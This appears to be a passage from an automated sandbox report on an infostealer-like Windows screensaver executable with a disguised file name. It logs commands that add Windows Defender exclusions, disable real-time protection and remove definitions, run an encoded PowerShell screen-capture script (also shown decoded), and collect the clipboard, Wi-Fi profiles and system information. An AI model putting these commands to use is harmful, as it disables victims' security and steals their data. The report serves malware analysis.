Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDB6D8 SetUnhandledExceptionFilter, 68_2_00007FF7F7EDB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 68_2_00007FF7F7EDA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EDB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_00007FF7F7EDB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7EE4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 68_2_00007FF7F7EE4C10

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F" Jump to behavior
